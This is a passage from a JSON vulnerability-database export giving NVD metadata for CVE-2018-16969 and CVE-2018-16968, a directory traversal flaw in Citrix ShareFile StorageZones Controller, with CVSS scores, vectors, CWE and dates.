"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-16969"], "modified": 
"2018-11-23T16:43:00", "cpe": [], "id": "CVE-2018-16969", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16969", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T14:23:41", "description": "Citrix ShareFile StorageZones Controller before 5.4.2 allows Directory Traversal.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 3.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-09-26T21:29:00", "type": "cve", "title": "CVE-2018-16968", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-16968"], "modified": "2018-11-23T16:44:00", "cpe": [], "id": "CVE-2018-16968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16968", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}]}